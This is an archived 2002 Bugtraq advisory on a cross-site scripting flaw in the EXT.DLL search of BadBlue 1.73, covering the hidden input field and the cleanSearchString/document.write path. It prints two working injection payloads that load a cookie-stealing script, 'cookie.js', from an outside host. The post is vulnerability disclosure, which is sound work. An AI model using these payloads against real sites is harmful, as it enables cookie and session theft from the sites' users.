[26089] in bugtraq
BadBlue 1.73 EXT.DLL XSS Variant
daemon@ATHENA.MIT.EDU (Matthew Murphy)
Mon Jul 8 16:32:46 2002
Message-ID: <005001c226b2$d76eeb40$e62d1c41@kc.rr.com>
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: "SecurITeam News" <news@securiteam.com>, <bugtraq@securityfocus.com>
Date: Mon, 8 Jul 2002 14:08:27 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Advisory: Variant of BID #5086 Discovered in BadBlue
1.73
As I originally reported in my alert regarding the ext.dll of
BadBlue, it is prone to XSS attacks. EXT.DLL has been
re-written to generate its HTML differently as of BBPE
1.73. Rather than simply placing it in the output, BadBlue
passes the query on to a function called 'cleanSearchString'.
However, two vulnerabilities still exist. One vulnerability
introduced in BBPE 1.73 (cleanSearchString) and another
that wasn't patched from the older versions (the INPUT
vulnerability)
When searching for "<>", we find two locations where our
query is passed as a literal to the browser:
document.write(cleanSearchString('<>'));
<input type=hidden name=a0 value="<>">
In order to exploit the input vulnerability, the query is rather
obvious:
"><script src=http://www.murphy.101main.net/cookie.js></script>
However, don't be fooled by the complexity of the document.write()
call, either, this is still exploitable. :-D
') + '\x3cscript
src=http://www.murphy.101main.net/cookie.js\x3e\x3c/script\x3e'
The Moral of This Story?
No matter how you 'clean' it before writing client-side, if input is
displayed literally at ANY point in the document, it can be used to
divert the flow of execution to an attacker-supplied payload.
"The reason the mainstream is thought
of as a stream is because it is
so shallow."
- Author Unknown
